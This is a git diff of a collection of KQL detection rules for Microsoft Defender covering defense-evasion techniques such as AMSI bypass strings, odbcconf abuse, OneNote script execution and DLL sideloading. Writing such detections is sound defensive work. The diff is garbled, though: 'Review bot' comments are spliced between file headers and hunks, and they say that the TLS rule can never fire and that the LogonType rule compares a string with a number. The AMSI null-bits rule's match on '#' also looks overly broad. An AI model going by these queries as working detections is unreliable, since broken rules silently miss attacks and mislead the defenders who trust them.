+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql b/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql
index a715d372..6bf2b8c2 100644
--- a/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql
+++ b/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql
@@ -1,12 +1,12 @@
-// Title: Office Application Initiated Network Connection Over Uncommon Ports
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-12
-// Level: medium
-// Description: Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.command-and-control
-// False Positives:
-// - Other ports can be used, apply additional filters accordingly
-
-DeviceNetworkEvents
+// Title: Office Application Initiated Network Connection Over Uncommon Ports
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-12
+// Level: medium
+// Description: Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control
+// False Positives:
+// - Other ports can be used, apply additional filters accordingly
+
+DeviceNetworkEvents
 | where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemotePort in~ ("53", "80", "139", "389", "443", "445", "3268")) or ((RemotePort in~ ("143", "465", "587", "993", "995")) and InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql b/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql
index 7fbac1fe..79517046 100644
--- a/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql
+++ b/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql
@@ -1,12 +1,12 @@
-// Title: Old TLS1.0/TLS1.1 Protocol Version Enabled
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-05
-// Level: medium
-// Description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Legitimate enabling of the old tls versions due to incompatibility
-
-DeviceRegistryEvents
+// Title: Old TLS1.0/TLS1.1 Protocol Version Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: medium
+// Description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate enabling of the old tls versions due to incompatibility
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0*" or RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.1*") and RegistryKey endswith "\\Enabled"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql
index bcda8393..a10c127d 100644
--- a/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql
+++ b/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql
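Review bot: The `| where` line can never be true: KQL `endswith` has no wildcard, so `RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0*"` requires a literal trailing `*`, and the same column is also required to `endswith "\\Enabled"`; the two conditions are mutually exclusive and the rule is silent in production. The protocol check should be a substring test on the subkey path, e.g. `RegistryKey contains "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0\\"` (and likewise for `TLS 1.1\\`), with the `endswith "\\Enabled"` clause kept as is. `RegistryValueData =~ "DWORD (0x00000001)"` also looks like the Sysmon rendering of the value rather than what DeviceRegistryEvents emits, which is normally the bare number, so `RegistryValueData == "1"` should be confirmed against live data before this rule is relied on.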
@@ -1,12 +1,12 @@
-// Title: OneNote Attachment File Dropped In Suspicious Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-22
-// Level: medium
-// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Legitimate usage of ".one" or ".onepkg" files from those locations
-
-DeviceFileEvents
+// Title: OneNote Attachment File Dropped In Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of ".one" or ".onepkg" files from those locations
+
+DeviceFileEvents
 | where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql
index 25eb58fd..f7a4abcf 100644
--- a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql
+++ b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql
@@ -1,13 +1,13 @@
-// Title: OneNote.EXE Execution of Malicious Embedded Scripts
-// Author: @kostastsale
-// Date: 2023-02-02
-// Level: high
-// Description: Detects the execution of malicious OneNote documents that contain embedded scripts.
-// When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: OneNote.EXE Execution of Malicious Embedded Scripts
+// Author: @kostastsale
+// Date: 2023-02-02
+// Level: high
+// Description: Detects the execution of malicious OneNote documents that contain embedded scripts.
+// When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\exported\\" or ProcessCommandLine contains "\\onenoteofflinecache_files\\") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\onenote.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql b/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql
index 268f65c5..f14437f7 100644
--- a/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql
+++ b/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql
@@ -1,10 +1,10 @@
-// Title: OpenWith.exe Executes Specified Binary
-// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
-// Date: 2019-10-12
-// Level: high
-// Description: The OpenWith.exe executes other binary
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: OpenWith.exe Executes Specified Binary
+// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
+// Date: 2019-10-12
+// Level: high
+// Description: The OpenWith.exe executes other binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql
index c5ad1551..420bbeae 100644
--- a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql
+++ b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql
@@ -1,11 +1,11 @@
-// Title: Outbound Network Connection Initiated By Cmstp.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-30
-// Level: high
-// Description: Detects a network connection initiated by Cmstp.EXE
-// Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.003
-
-DeviceNetworkEvents
+// Title: Outbound Network Connection Initiated By Cmstp.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects a network connection initiated by Cmstp.EXE
+// Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.003
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql b/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql
index 7a45bdbf..f38685ec 100644
--- a/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql
+++ b/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql
@@ -1,12 +1,12 @@
-// Title: Outbound Network Connection To Public IP Via Winlogon
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2023-04-28
-// Level: medium
-// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011
-// False Positives:
-// - Communication to other corporate systems that use IP addresses from public address spaces
-
-DeviceNetworkEvents
+// Title: Outbound Network Connection To Public IP Via Winlogon
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2023-04-28
+// Level: medium
+// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011
+// False Positives:
+// - Communication to other corporate systems that use IP addresses from public address spaces
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql b/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql
index f4897dc8..e1e7be01 100644
--- a/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql
+++ b/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql
@@ -1,12 +1,12 @@
-// Title: Outgoing Logon with New Credentials
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022-04-06
-// Level: low
-// Description: Detects logon events that specify new credentials
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1550
-// False Positives:
-// - Legitimate remote administration activity
-
-DeviceLogonEvents
+// Title: Outgoing Logon with New Credentials
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: low
+// Description: Detects logon events that specify new credentials
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1550
+// False Positives:
+// - Legitimate remote administration activity
+
+DeviceLogonEvents
 | where LogonType == 9
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql b/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql
index 0781adc6..244cfed8 100644
--- a/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql
+++ b/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql
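Review bot: `| where LogonType == 9` compares a column that DeviceLogonEvents exposes as a string (values such as "Interactive", "Network", "RemoteInteractive") against an integer, so the query either fails to compile (string versus long) or, if coerced, never matches; the Windows numeric logon type 9 from the Sigma source is not what this table carries. I am not aware of a DeviceLogonEvents LogonType value that corresponds to NewCredentials, so the rule may not be expressible on this table at all and should be confirmed against live data rather than shipped as if it fires. If the converter has to emit something, a header line such as `// NOTE: Windows logon type 9 (NewCredentials) has no direct DeviceLogonEvents LogonType value - validate before enabling` would stop it being deployed unreviewed.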
@@ -1,10 +1,10 @@
-// Title: Password Provided In Command Line Of Net.EXE
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021-12-09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.initial-access, attack.persistence, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1078
-
-DeviceProcessEvents
+// Title: Password Provided In Command Line Of Net.EXE
+// Author: Tim Shelton (HAWK.IO)
+// Date: 2021-12-09
+// Level: medium
+// Description: Detects a when net.exe is called with a password in the command line
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.initial-access, attack.persistence, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1078
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql
index 641540a3..310bd1a4 100644
--- a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql
+++ b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql
@@ -1,13 +1,13 @@
-// Title: PDF File Created By RegEdit.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-07-08
-// Level: high
-// Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process.
-// This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: PDF File Created By RegEdit.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-08
+// Level: high
+// Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process.
+// This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\regedit.exe" and FolderPath endswith ".pdf"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/ping_hex_ip.kql b/KQL/rules/Defense Evasion/ping_hex_ip.kql
index 3d380ea3..2c8c6cb8 100644
--- a/KQL/rules/Defense Evasion/ping_hex_ip.kql
+++ b/KQL/rules/Defense Evasion/ping_hex_ip.kql
@@ -1,12 +1,12 @@
-// Title: Ping Hex IP
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-03-23
-// Level: high
-// Description: Detects a ping command that uses a hex encoded IP address
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140, attack.t1027
-// False Positives:
-// - Unlikely, because no sane admin pings IP addresses in a hexadecimal form
-
-DeviceProcessEvents
+// Title: Ping Hex IP
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-23
+// Level: high
+// Description: Detects a ping command that uses a hex encoded IP address
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.t1027
+// False Positives:
+// - Unlikely, because no sane admin pings IP addresses in a hexadecimal form
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "0x[a-fA-F0-9]{8}" and FolderPath endswith "\\ping.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql
index a7595a4a..a24b501c 100644
--- a/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql
+++ b/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential 7za.DLL Sideloading
-// Author: X__Junior
-// Date: 2023-06-09
-// Level: low
-// Description: Detects potential DLL sideloading of "7za.dll"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed.
-
-DeviceImageLoadEvents
+// Title: Potential 7za.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-06-09
+// Level: low
+// Description: Detects potential DLL sideloading of "7za.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed.
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql b/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql
index 8b98624d..13d64694 100644
--- a/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql
+++ b/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql
@@ -1,12 +1,12 @@
-// Title: Potential Adplus.EXE Abuse
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-09
-// Level: high
-// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.credential-access, attack.t1003.001
-// False Positives:
-// - Legitimate usage of Adplus for debugging purposes
-
-DeviceProcessEvents
+// Title: Potential Adplus.EXE Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: high
+// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate usage of Adplus for debugging purposes
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql b/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql
index c052d00a..ba5a1327 100644
--- a/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql
+++ b/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql
@@ -1,10 +1,10 @@
-// Title: Potential AMSI Bypass Using NULL Bits
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-04
-// Level: medium
-// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceProcessEvents
+// Title: Potential AMSI Bypass Using NULL Bits
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-04
+// Level: medium
+// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql b/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql
index 6defa1db..941c62c3 100644
--- a/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql
+++ b/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql
@@ -1,12 +1,12 @@
-// Title: Potential AMSI Bypass Via .NET Reflection
-// Author: Markus Neis, @Kostastsale
-// Date: 2018-08-17
-// Level: high
-// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential AMSI Bypass Via .NET Reflection
+// Author: Markus Neis, @Kostastsale
+// Date: 2018-08-17
+// Level: high
+// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" and ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql b/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql
index ce646212..b848e165 100644
--- a/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql
+++ b/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql
@@ -1,10 +1,10 @@
-// Title: Potential AMSI COM Server Hijacking
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-04
-// Level: high
-// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceRegistryEvents
+// Title: Potential AMSI COM Server Hijacking
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-04
+// Level: high
+// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql
index 547d4adf..d29ed7b6 100644
--- a/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql
+++ b/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql
@@ -1,14 +1,14 @@
-// Title: Potential Antivirus Software DLL Sideloading
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022-08-17
-// Level: medium
-// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.
-// - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.
-// - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file
-
-DeviceImageLoadEvents
+// Title: Potential Antivirus Software DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.
+// - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.
+// - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file
+
+DeviceImageLoadEvents
